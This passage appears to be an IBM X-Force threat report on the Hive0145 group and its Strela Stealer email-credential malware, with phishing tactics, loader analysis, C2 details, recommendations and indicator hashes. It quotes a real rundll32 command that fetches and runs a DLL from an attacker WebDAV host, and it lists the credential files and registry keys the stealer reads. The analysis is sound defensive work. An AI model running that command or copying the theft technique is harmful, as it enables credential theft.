1-strela_santander.png" width="547.8264947245018" height="544" lightbox="lightbox"></amp-img></strong></p> <p><em>Figure 1 Banco Santander-themed email campaign</em></p> <p>Hive0145 continued this pattern of using generic messages and fake invoices and receipts throughout the first half of 2024. However, by early July 2024, the group adopted a different approach and began weaponizing stolen emails of actual entities across financial, technology, manufacturing, media, e-commerce and other industries. The departure in simplicity indicates Hive0145’s shift in a maturing cyber operations capability.</p> <h2>Attachment hijacking</h2> <p>In July 2024, X-Force observed a mid-campaign change in the emails being distributed by Hive0145, with the short and generic messages being replaced with what appeared to be legitimate stolen emails. The <a href="https://www.ibm.com/topics/phishing" target="_blank" rel="noopener nofollow" >phishing</a> emails exactly matched official invoice communication emails and, in some cases, still directly addressed the original recipients by name. X-Force was able to verify that the emails were in fact authentic invoice notifications from a variety of entities across financial, technology, manufacturing, media, e-commerce and other industries. It is likely that the group sourced the emails through previously exfiltrated credentials from their prior campaigns.</p> <p>The concept of using stolen emails is not new, it was used extensively by the Emotet group and malware distributors such as Hive0118 (aka TA577), <a href="https://www.proofpoint.com/us/blog/security-briefs/ta551-uses-sliver-red-team-tool-new-activity" target="_blank" rel="noopener nofollow" >TA551</a> and <a href="https://www.proofpoint.com/sites/default/files/misc/pfpt-us-threat-research-2023-05-12-cybercrime-experimentation.pdf" target="_blank" rel="noopener nofollow" >TA570</a>. In their campaigns, they leveraged thread hijacking, where new threads to stolen emails were used as a way to increase the appearance of legitimacy. The modified emails were sent to corresponding contacts of previous victims, making the final email look like a reply to the stolen email, thereby hijacking the email thread. The text the distributors add to the emails is often short replies, urging victims to look at the included attachments or URLs.</p> <p>The technique employed by Hive0145 differs from thread-hijacking in that rather than adding a reply message to the stolen email, the original contents remain largely unmodified and only the attachment is switched to include a malicious payload using the original filename (without the original extension). Within the email body, Hive0145 also replaces both the local part and the domain of the original email sender with that of the new phishing victim to custom-tailor the email. The emails with hijacked attachments are then sent out in mass phishing campaigns. Hive0145 also appears to carefully consider the hijacked emails by only selecting ones referring to invoices and containing attachments. X-Force has observed the attachment hijacking technique since mid-2024 in campaigns targeting German, Spanish and Ukrainian speakers.</p> <p><strong><amp-img src="https://images1.cmp.optimizely.com/Zz1jYTBkYzQwMmEwN2ExMWVmYmM1YzI2ZmFmZTE3ZDc1MA==" layout="intrinsic" class="" alt="fig 2-image-2024-11-5_16-42-6.png" width="544" height="615.3951497860199" lightbox="lightbox"></amp-img></strong></p> <p><em>Figure 2 Example of original stolen email of a Deutsche Bahn invoice with hijacked attachment</em></p> <h2>Late 2024 campaign</h2> <p>The July 2024 campaign began to reveal low volumes of email delivery throughout the week of 8 July. Hive0145 appeared to take a short break before returning with a larger campaign the week of 22 July, followed by a period of inactivity. Starting mid-October 2024, Hive0145 returned with a widespread attachment hijacking campaign targeting Spanish, German and Ukrainian victims. Unlike the brief July campaign, this one has continued sending out notable volumes of emails with the majority sent during weekdays.</p> <p><amp-img src="https://images1.cmp.optimizely.com/Zz1kNWYyZTYxY2EwN2ExMWVmYmM1YzI2ZmFmZTE3ZDc1MA==" layout="intrinsic" class="" alt="fig 3-image copy.png" width="672" height="112" lightbox="lightbox"></amp-img></p> <p><em>Figure 3 The ongoing late-October 2024 campaign</em></p> <p>Emails stolen across financial, technology, manufacturing, media, e-commerce and other industries continue to be weaponized as of early November 2024, in one of the largest observed Hive0145 campaigns to date. In the ongoing campaign, the victim receives an archive containing a heavily obfuscated JavaScript file that downloads and executes a crypted Strela Stealer DLL. As of 7 November 2024, Hive0145 is including Ukrainian speakers in the ongoing campaign signaling a significant development compared to previously observed victimology.</p> <p><strong><amp-img src="https://images3.cmp.optimizely.com/Zz1mYWMzNGEyY2EwN2ExMWVmYTdmYTllMDI5N2MwOTY3Mg==" layout="intrinsic" class="" alt="fig 4-Screenshot 2024-11-11 at 08.59.58.png" width="544" height="616.068376068376" lightbox="lightbox"></amp-img></strong></p> <p><em>Figure 4 Example of the original stolen email of an invoice targeting Ukraine</em></p> <p>Hive0145’s increased volume of delivery using attachment hijacking with a steady supply of freshly stolen emails may suggest the group has adopted automation for harvesting, weaponizing, packaging and sending their phishing emails. The group continues to show a preference for widespread exploitation of Spanish, German and Ukrainian victims throughout Europe.</p> <h2>Evolving techniques</h2> <p>Hive0145 stands out among other malware distributors for their level of effort to adopt increasingly sophisticated methods of delivering Strela Stealer. The level of sophistication reflects on other successful mass distributors of malware such as Emotet, Pikabot and Qakbot, which often led to the deployment of <a href="https://www.ibm.com/topics/ransomware" target="_blank" rel="noopener nofollow" >ransomware</a>. Below is a breakdown of notable techniques used by Hive0145 over time, with some being briefly tested and others fully adopted.</p> <h3>Polyglots</h3> <p>The first Strela Stealer campaigns observed by X-Force made use of polyglot files, as first reported in a <a href="https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc" target="_blank" rel="noopener nofollow" >blog by DCSO (Deutsche Cyber-Sicherheitsorganisation)</a> in late 2022. These files have multiple valid formats and can be parsed by different applications. The same file could be rendered as both HTML to display a decoy invoice as well as be a valid DLL, implementing Strela Stealer. This is a rather uncommon technique for attempting to bypass security solutions.</p> <h3>Signed binaries</h3> <p>Multiple campaigns throughout 2023 made use of valid code signing certificates for the malicious Strela Stealer binaries. For example, campaigns targeting Spanish-speaking victims dating back to April 2023 contained payloads with a valid certificate signed by <b>Tecfinance Informatica E Projetos De Sistemas Ltda</b>, a software company in Brazil.</p> <p><strong><amp-img src="https://images4.cmp.optimizely.com/Zz0wZTc0Y2ViYWEwN2IxMWVmYWUxOTJhOGIzMTc4OTEwMw==" layout="intrinsic" class="" alt="fig 5-image.png" width="573" height="455" lightbox="lightbox"></amp-img></strong></p> <p><em>Figure 5 Brazilian company certificate used in 2023 campaigns</em></p> <p>On 5 May 2024, X-Force took steps to inform relevant parties of the finding, and the certificate has since been revoked.</p> <p>Of note, a mid-2023 Italy-targeted campaign used a different certificate:</p> <p><strong><amp-img src="https://images1.cmp.optimizely.com/Zz0xYjA0NGNiZWEwN2IxMWVmOGEzYzJhYzI5NDg3NjE0MA==" layout="intrinsic" class="" alt="fig 6-Screenshot 2023-05-15 at 12.58.52.png" width="341" height="372" lightbox="lightbox"></amp-img></strong></p> <p><em>Figure 6 Another stolen certificate used in mid-2023 to target Italian victims</em></p> <h2>Targeted phishing</h2> <p>Strela Stealer phishing campaigns also tailored filenames to include targeted domain names. The file names are often identical to the name of the organization or company, potentially in an attempt to generate authenticity. The example below is a phishing email from 2023 posing as an invoice or payment receipt.</p> <p><amp-img src="https://images3.cmp.optimizely.com/Zz0yOWJhYjYzMGEwN2IxMWVmYTVjZWU2NTBmNjQyY2Y2Ng==" layout="intrinsic" class="" alt="fig 7-strela_factura.png" width="547.8354876615747" height="544" lightbox="lightbox"></amp-img></p> <p><em>Figure 7 Factura-themed email campaign</em></p> <p>As the email suggests, the attachments are encrypted ZIP files, with passwords slightly differing between every email. Threat actors encrypt email attachments since basic email filtering and sandbox solutions often cannot inspect or detonate those files.</p> <p>Strela Stealer has also used uncommon extensions for their PE executable files such as <b>.com</b> instead of <b>.exe</b>:</p> <table class="ScrollCode" style="border: 1pt dashed #6199c9; width: 88.5174%;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 100%; border: none; padding: 8.65pt 5pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">transferencia_<domain_name>.com</span></span></p> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">factura_<domain_name>.com</span></span></p> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">FATTURA_<domain_name>.bat.exe</span></span></p> </div> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <p>This makes use of a condition in Microsoft Windows operating systems where three different extensions can be used to mark a file as executable: <b>.exe, .com, </b>and<b> .pif.</b></p> <p>If the content is an executable PE file, Microsoft Windows will run it automatically once opened. By using the more uncommon and unknown extensions, the campaign may evade simple anti-virus solutions or victim suspicion. Earlier campaigns with the same payloads were also observed to make use of the <b>.pif</b> extension.</p> <h2>Packing, obfuscation and crypting</h2> <p>Apart from directly attached ZIP archives with the malicious executables, Strela Stealer campaigns also often use obfuscated scripts such as Batch, JavaScript or PowerShell to download or drop their payload.</p> <p>Campaigns throughout 2024 mainly relied on these obfuscated scripts to run a PowerShell command to connect to a WebDAV server and download and execute a crypted DLL:</p> <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #003366;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">“C:\Windows\system32\rundll32.exe”</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';"> \\</span></span><span style="color: #009900;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">94.159</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">.</span></span><span style="color: #009900;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">113.48</span></span><span style="color: gray;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">@8888</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">\davwwwroot\</span></span><span style="color: #009900;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">157161090119030</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">.dll,Entry</span></span></p> </div> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <p>The WebDAV staging servers host a large number of DLLs, with different names and hashes. They appear to have been built using a crypter X-Force identifies as “Stellar Crypter,” which has likely been in use exclusively by Hive0145 since at least May 2023. The malicious binaries identified as “Stellar Loader” contain the encrypted Strela Stealer payload.</p> <h2>Stellar Loader</h2> <p>Stellar Loader is a crypter that has been in use since at least April 2023 and is predominantly a precursor to follow on Strela Stealer payloads. Stellar samples are usually highly obfuscated and make use of techniques such as control flow obfuscation and include large amounts of junk instructions to hinder analysis and signature creation. Stellar’s payload is XOR encrypted and stored in the .data section of the Stellar loader binary. The encrypted payload data is preceded by the XOR key which, in recent samples, consists solely of upper and lowercase letters and can be thousands of characters long.</p> <p>Upon execution, Stellar Loader decrypts the payload data using XOR and the stored key. The decryption process may also involve an additional round of XOR using a hardcoded single-byte key. As part of the Stellar Loader code’s obfuscation, the decryption algorithm within the code is often expanded to include hundreds of operations. However, the vast majority of these operations cancel each other out, and what appears as a complex algorithm can be reduced down to a simple XOR operation. The screenshot below shows a version of Stellar Loader with minimal obfuscation, where the structure of the loader code and decryption algorithm can be easily seen.</p> <p><amp-img src="https://images4.cmp.optimizely.com/Zz0zZDg2NjY1MGEwN2IxMWVmYWUxOTJhOGIzMTc4OTEwMw==" layout="intrinsic" class="" alt="fig 8-241105-stellar-loader-code.PNG" width="675" height="632" lightbox="lightbox"></amp-img></p> <p>In more recent versions of the loader, the encrypted payload data is followed by an additional encrypted block containing a list of API names required by the loader code, such as VirtualAlloc. The loader decrypts this block using the same key as the payload but without the additional single-byte XOR. The loader can then use the API names in the block to retrieve the corresponding API addresses.</p> <p><amp-img src="https://images1.cmp.optimizely.com/Zz02YTFlOTUwY2EwN2IxMWVmYmRiNDI2ZmFmZTE3ZDc1MA==" layout="intrinsic" class="" alt="fig 9-241105-stellar-decrypted-apis.PNG" width="593" height="128" lightbox="lightbox"></amp-img></p> <p>Once the payload and API list have been decrypted, Stellar allocates space in memory using VirtualAlloc and maps the payload PE at the allocated address. It then performs the standard PE loading steps, such as loading its imports and processing any relocation sections (.relocs), and finally, it executes the payload at its entry point address.</p> <h2>Strela Stealer</h2> <p>Strela Stealer changed little in functionality over the past two years. Starting with the initial version reported on by <a href="https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc" target="_blank" rel="noopener nofollow" >DCSO</a> in late 2022, the main objective of the stealer is to exfiltrate email credentials from two common email clients: Microsoft Outlook and Thunderbird. This is consistent across all variants, however, the latest variant does support more registry keys to search for Microsoft Outlook credentials than prior versions.</p> <p>Strela Stealer runs two functions tasked with stealing credentials from two email clients:</p> <table class="ScrollTableNormal" style="width: 1067px; border-collapse: collapse; border: none;" border="1" cellspacing="0" cellpadding="0"> <thead> <tr> <td style="width: 55.4453px; border: 1pt solid #dddddd; background: #f0f0f0; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Email client</span></b></p> </td> <td style="width: 301.875px; border-top: 1pt solid #dddddd; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-image: initial; border-left: none; background: #f0f0f0; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Thunderbird</span></b></p> </td> <td style="width: 693.43px; border-top: 1pt solid #dddddd; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-image: initial; border-left: none; background: #f0f0f0; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Microsoft Outlook</span></b></p> </td> </tr> </thead> <tbody> <tr> <td style="width: 55.4453px; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-left: 1pt solid #dddddd; border-image: initial; border-top: none; background: #f4f5f7; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;">Location</span></p> </td> <td style="width: 301.875px; border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">File system</p> </td> <td style="width: 693.43px; border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Registry</p> </td> </tr> <tr> <td style="width: 55.4453px; border-right: 1pt solid #dddddd; border-bottom: 1pt solid #dddddd; border-left: 1pt solid #dddddd; border-image: initial; border-top: none; background: #f4f5f7; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;">Path</span></p> </td> <td style="width: 301.875px; border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #292929;">%APPDATA%\Thunderbird\Profiles\</span>logins.json</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #292929;">%APPDATA%\Thunderbird\Profiles\</span>key4.db</p> </td> <td style="width: 693.43px; border-top: none; border-left: none; border-bottom: 1pt solid #dddddd; border-right: 1pt solid #dddddd; padding: 1.5pt 1.5pt 1pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SOFTWARE\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SOFTWARE\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Software\\Microsoft\\Windows Messaging Subsystem\\Profiles\\9375CFF0413111d3B88A00104B2A6676</p> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676</p> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <p>For Outlook, Strela Stealer specifically looks for the registry values:</p> <ul type="disc"> <li>IMAP Server</li> <li>IMAP User</li> <li>IMAP Password – decrypted using <i>CryptUnprotectData()</i></li> </ul> <p>The data is formatted and prepended with the string “FF” or “OL” for Thunderbird data and Outlook data, respectively. Next, it is also encrypted with a static XOR key, which represents a GUID string such as:</p> <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">96be98b2-8a00-410d-87da-2482cc8b7793</span></span></p> </div> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <p>Then, Strela Stealer sends a POST request for each email client to its hardcoded C2 server:</p> <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">http:</span></span><span style="color: #008200;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">//94.159.113[.]48/server.php</span></span></p> </div> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <p>The response is decrypted via the same XOR key above. Strela Stealer continues to send out POST requests in 1-second intervals until a request fails or it receives back the string “KH” (2023 versions), “ANTIROK” (2024 versions) or “CHOLLIMA” (Nov. 2024 versions).</p> <p>As of October 2024, Strela Stealer also includes two more exfiltration functions. The first gathers system information on the host and writes it to a file via the command:</p> <p><amp-img src="https://images2.cmp.optimizely.com/Zz0wZmQyMDI4MGEwODcxMWVmYWNmNDY2OGUwNDMwMWU2OQ==" layout="intrinsic" class="" alt="Strela Stealer screen1.png" width="683" height="58" lightbox="lightbox"></amp-img></p> <p>The second exfiltration function uses COM objects to enumerate the list of installed applications from the “AppsFolder” (a virtual folder, displayed as “Applications”) on the victim machine.</p> <p><strong><amp-img src="https://images3.cmp.optimizely.com/Zz03NjhhNWNkNmEwN2IxMWVmOTM2ODYyNGVkMjA4MzQyMg==" layout="intrinsic" class="" alt="fig 10-image-2024-10-31_14-21-3.png" width="673" height="511" lightbox="lightbox"></amp-img></strong></p> <p>The dropped file, as well as the list of installed applications, are read and encrypted before exfiltration in the same fashion as the others. They are sent to the C2 server with identifiers “SI” and “LA” respectively.</p> <h2>Language checks</h2> <p>Strela Stealer started to implement language checks by verifying the keyboard language on the victim host. Versions throughout 2024 only run on hosts with one of the following keyboard languages:</p> <ul type="disc"> <li>Spanish</li> <li>German</li> <li>Catalan</li> <li>Polish</li> <li>Italian</li> <li>Basque</li> </ul> <p><strong><amp-img src="https://images2.cmp.optimizely.com/Zz1iMzU5YzM1ZWEwN2IxMWVmYWNmNDY2OGUwNDMwMWU2OQ==" layout="intrinsic" class="" alt="fig 11-image-2024-10-31_12-58-20.png" width="513" height="303" lightbox="lightbox"></amp-img></strong></p> <p>In early November, Hive0145 started distributing stolen Ukrainian emails as well and modified the language verification logic slightly, adding Ukrainian (0x422) to the list of keyboard layouts. In addition, the developers switched to using the <i>GetKeyboardLayoutList</i> API to cover all installed keyboard layouts. If none of the languages match, Strela Stealer has a secondary check comparing the result of the user’s default locale from <i>GetLocaleInfoA </i>against “AU” and “UA”, which are the codes for Australia and Ukraine. It is possible that the developer was not sure of the endianness of the returned value and did not intend to target Australia. Overall, these changes increase the scope of machines available for a Strela Stealer infection.</p> <p><strong><amp-img src="https://images3.cmp.optimizely.com/Zz1iZWQ1MTFmMmEwN2IxMWVmOTI4NWU2NTBmNjQyY2Y2Ng==" layout="intrinsic" class="" alt="fig 12-image (9).png" width="667" height="91" lightbox="lightbox"></amp-img></strong></p> <p>Previously the malware would display an unobtrusive error message to the user after running in order to not raise any suspicion. It states that the file was corrupted and not able to be opened, in the language depending on the installed keyboard. The latest versions use the more universal error message “Err 100”, which is shown after 5 seconds from the beginning of execution.</p> <h2>.NET variant</h2> <p>In June 2023, X-Force observed a single Italy-targeted Hive0145 campaign delivering a new Strela Stealer variant that was completely rewritten in <strong>.NET</strong>. Similar to campaigns before it also made use of valid code signing certificates. Re-implementing malware in a different language shows a significant effort by the threat actor. In order to conceal strings, function names and control flow, the developers made use of the commercial “Aldaray Rummage Obfuscator” for <strong>.NET</strong>. The screenshot below shows the code used to access and unprotect IMAP credentials from Microsoft Outlook registry keys.</p> <p><strong><amp-img src="https://images3.cmp.optimizely.com/Zz1lMjkyOWY2MGEwN2IxMWVmOTM2ODYyNGVkMjA4MzQyMg==" layout="intrinsic" class="" alt="fig 13-image-2024-11-1_10-43-23.png" width="561" height="455" lightbox="lightbox"></amp-img></strong></p> <p>Notably, the commercial obfuscator does include a watermark for the license, which was observed as:</p> <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">Rummage is licensed to Victoria Semigodova (issue J) </span></span><span style="color: #336699; font-weight: bold;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">for</span></span><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';"> use with any product. 5687c5da50660eda</span></span></p> </div> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <p>The sample above displays the following error message in Italian:</p> <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">Il file viene arrestato e non può essere eseguito.</span></span></p> </div> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <h2>Hive0145 objectives</h2> <p>Hive0145’s focus on harvesting email credentials sets them apart from other operators of stealer or botnet malware, which are often commoditized and target a broader range of credentials and data, or facilitate follow-on payloads intended for initial access. Hive0145’s use of stolen emails for attachment hijacking is an indicator that a portion of stolen email credentials may be used to harvest legitimate emails for further distribution. Both stolen and actor-created emails used by Hive0145 predominantly feature invoices as themes, which points towards potential financial motivation. It is possible that Hive0145 may sell stolen emails to affiliate partners for the purposes of further business email compromise.</p> <h2>Conclusion:</h2> <p>Hive0145 is a rapidly maturing cyber criminal threat actor and seeks to infect victims with the intention of gaining valid email credentials. Observations suggest that the theft of email credentials, through initial campaigns, led to further theft of valid emails used in subsequent attachment hijacking campaigns. Stela Stealer malware continues to be an effective tool for Hive0145 to extract email credentials.</p> <p>The wide variety of industries emulated by Hive0145’s email campaigns increases the potential risk of being targeted for commercial organizations throughout Europe. Of note, organizations in Italian, Spanish, German, or Ukrainian-speaking regions may be at more immediate risk of a Hive0145 campaign. X-Force recommends heightened vigilance surrounding email attachments received and careful review of the expected file type delivered.</p> <h2>Recommendations:</h2> <p>X-Force recommends organizations:</p> <ul type="disc"> <li>Exercise caution with emails and ZIP archive attachments</li> <li>Consider changing the default application for Javascript/JScript/VBScript files to Notepad</li> <li>Monitor rundll32.exe processes executing remotely hosted DLLs</li> <li>Install and configure endpoint security software</li> <li>Update relevant network security monitoring rules</li> <li>Educate staff on the potential threats to the organization</li> </ul> <table class="ScrollTableNormal" style="border-collapse: collapse; border: none;" border="1" cellspacing="0" cellpadding="0"> <thead> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator</span></b></p> </td> <td style="width: 67.7pt; border: solid #DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator Type</span></b></p> </td> <td style="width: 201.55pt; border: solid #DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Context</span></b></p> </td> </tr> </thead> <tbody> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">03853c56bcfdf87d71ba4e17c4f6b55f989edb29fc1db2c82de3d50be99d7311</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader (Oct 2024)</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">e50bea80513116a1988822fe02538d3af4d91505d4098afca4ea741bcf4cd427</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader (May 2024)</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">2cac42735170cd3f67111807a7e48f8fca104eb97c379129872249160d90e22d</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; 